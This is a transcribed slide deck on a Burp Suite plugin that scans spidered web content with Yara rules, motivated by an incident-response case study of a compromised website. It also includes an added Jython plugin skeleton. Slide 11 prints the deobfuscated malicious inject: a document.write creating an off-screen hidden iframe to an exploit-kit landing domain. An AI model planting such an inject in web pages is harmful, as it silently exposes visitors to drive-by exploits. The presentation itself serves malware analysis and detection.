Burpsuite / Yara Integration
Ian Duffy, Polito, Inc. (@politoinc)

Posted on 16-Jan-2017


Page 1: Burpsuite yara

Burpsuite / Yara Integration

Ian Duffy, Polito, Inc. (@politoinc)

Page 2: Burpsuite yara

Introduction

• Who am I?
• About Burpsuite and Yara
• Case study: A compromised website
• Plugin development
• Future Roadmap
• Questions

Page 3: Burpsuite yara

Who am I?

• Former USAF network defender
• Current cybersecurity consultant for Polito
• Background in penetration testing (traditional and web application) as well as malware analysis
• Current duties involve malware analysis and threat hunting

Page 4: Burpsuite yara

Burpsuite

• Burpsuite is a MITM proxy tool for viewing, intercepting, modifying, and transmitting HTTP(S) requests and responses.

• Allows the user to view all web content down to the byte level, to include static pages, JavaScript, JSON, WebSockets, and much more.

• Includes several tools for assessing the security of web applications

Page 5: Burpsuite yara

BurpSuite

Page 6: Burpsuite yara

Yara

• Yara is a sophisticated pattern matching tool
• Specifies a language for describing strings, binary / hexadecimal data, file offset information, and file structure information in order to write pattern matching rules
• Rules can be run against one or many files or data streams in order to find matches

Page 7: Burpsuite yara

Yara Rules Example

Page 8: Burpsuite yara

Case Study

• Client contacts Polito and says that their IT department is getting phone calls stating that their website is causing “FireEye Alerts” and is likely compromised
• Polito is asked to investigate and determine:
– Whether the site is actually compromised
– If so, the scope, scale, and impact of the compromise

Page 9: Burpsuite yara

Case Study

• We request a tarball of the current webroot folder and a dump of any backend CMS databases

• In the meantime we begin spidering the website using Burpsuite…

Page 10: Burpsuite yara

Case Study

Highly obfuscated JavaScript – interesting…

Page 11: Burpsuite yara

Case Study

• The obfuscated JavaScript is consistent with the Angler Exploit Kit, which matches the alerts reported by our client’s IT department

• After deobfuscation of the JavaScript we see the following:

document.write('<style>.ddidfodevxgsz{position:absolute;top:-907px;width:300px;height:300px;}</style><div class="ddidfodevxgsz"><iframe src="http://ryonfmza.buildera.cf/consent/knife-lodge-19720974" width="250" height="250"></iframe></div>');

Page 12: Burpsuite yara

Case Study

Page 13: Burpsuite yara

Case Study

• Problems:
– How do we identify whether this EK landing page / malicious JavaScript has been inserted into any other pages on the site?
– How do we identify whether the attackers have left themselves a back door?

Page 14: Burpsuite yara

Case Study

• Possible Solutions
– Wait three days for the client to get a tarball of their website uploaded to our SFTP server
– Manually search through online web content
– Write something to automate our searching

Page 15: Burpsuite yara

Writing Burpsuite Plugins

• Burpsuite supports plugins in Java, Ruby, and Python
– Ruby requires JRuby
– Python requires Jython

• We decided to use Python to develop our Yara integration for expedience

Page 16: Burpsuite yara

The Plugin…

• Burpsuite specifies several interfaces for performing various tasks

• Depending on what functionality we are trying to implement, we must implement one or more of those interfaces

• The interfaces specify methods that must be implemented in order to handle events from the Burpsuite UI

Page 17: Burpsuite yara

The Plugin…

• Each of the interfaces requires specific methods to be implemented
– IBurpExtender requires a method named registerExtenderCallbacks
– ITab requires methods named getTabCaption and getUIComponent
• Documentation for the interfaces is available at:
– https://portswigger.net/burp/extender/api/index.html

Page 18: Burpsuite yara

The Plugin…

• Our basic use case was as follows:
– Burpsuite user spiders a website to retrieve as much of the content as possible
– User right-clicks on the website in the Burp UI and selects “Scan with Yara”
– Yara is used to scan the content of the web requests and responses
– Results are displayed to the user in a tab

Page 19: Burpsuite yara

Jython

• Jython is a hybrid between Java and Python
• You can “import” Java classes, instantiate Java objects, and call their methods via Python code:

Page 20: Burpsuite yara

Jython

• Java objects are instantiated by calling a constructor method with the same name as the class
– No “new” keyword like in Java
– Parameters to the constructors are the same

• Once instantiated, class objects can be used just as with Java
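A skeleton of the interfaces and Jython idioms described on the last few slides, written as an added example rather than the PolitoInc plugin's own code: it implements IBurpExtender, ITab and IContextMenuFactory, builds the Swing tab by calling Java constructors directly, and hands each selected response to the yara command-line tool (assumed to be installed, since the yara-python C extension cannot be loaded by Jython). The rules-file path, the tab name and the stand-in classes used when the burp package is absent are assumptions.

```python
import os, subprocess, tempfile

try:
    from burp import IBurpExtender, ITab, IContextMenuFactory
    from javax.swing import JMenuItem, JScrollPane, JTextArea
except ImportError:
    # Not running under Burp/Jython (e.g. a unit test): plain stand-ins so the class still loads.
    class IBurpExtender(object): pass
    class ITab(object): pass
    class IContextMenuFactory(object): pass
    JMenuItem = JScrollPane = JTextArea = None

def parse_yara_output(text):
    """The yara CLI prints one 'rule_name /scanned/file' line per match; keep the rule names."""
    return [line.split()[0] for line in text.splitlines() if line.strip()]

def yara_scan(content, rules_file="/opt/yara/web_injects.yar"):   # assumed rules path
    """Write one response body to a temp file, run the yara CLI on it, return matching rule names."""
    fd, path = tempfile.mkstemp(suffix=".http")
    try:
        with os.fdopen(fd, "w") as fh:
            fh.write(content)
        return parse_yara_output(subprocess.check_output(["yara", rules_file, path]).decode("utf-8", "replace"))
    finally:
        os.unlink(path)

class BurpExtender(IBurpExtender, ITab, IContextMenuFactory):
    TAB_NAME = "Yara Scanner"

    def registerExtenderCallbacks(self, callbacks):      # IBurpExtender: called once at load time
        self._helpers = callbacks.getHelpers()
        # Jython instantiates a Java class by calling its name; there is no 'new' keyword.
        self._output = JTextArea(20, 80)
        callbacks.setExtensionName(self.TAB_NAME)
        callbacks.addSuiteTab(self)                      # Burp now calls the ITab methods below
        callbacks.registerContextMenuFactory(self)       # and createMenuItems on right-click
    def getTabCaption(self):                             # ITab
        return self.TAB_NAME
    def getUIComponent(self):                            # ITab
        return JScrollPane(self._output)
    def createMenuItems(self, invocation):               # IContextMenuFactory
        # Jython wires the Swing ActionListener through the actionPerformed keyword argument.
        return [JMenuItem("Scan with Yara", actionPerformed=lambda evt:
                          self.scan_messages(invocation.getSelectedMessages()))]
    def scan_messages(self, messages):
        for msg in messages:
            body = msg.getResponse()                     # None if the item has no response yet
            if body is None: continue
            url = self._helpers.analyzeRequest(msg).getUrl()
            for rule in yara_scan(self._helpers.bytesToString(body)):
                self._output.append("%s  %s\n" % (rule, url))
```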

Page 21: Burpsuite yara

Demonstration

Live demo time – this always works!

Page 22: Burpsuite yara

Future Roadmap

• Things that we are looking into:
– Live Yara scanning as you surf
– Persistent configuration settings
– Multiple rules files

• Your thoughts and feature requests are most welcome!

Page 23: Burpsuite yara

Grab a Copy

• Plugin is available on our Github site: https://github.com/PolitoInc/Yara-Scanner

• Please send any feedback to [email protected]

Page 24: Burpsuite yara

Questions?

Ian Duffy, Polito, Inc. (@politoinc)

www.politoinc.com

Thank You!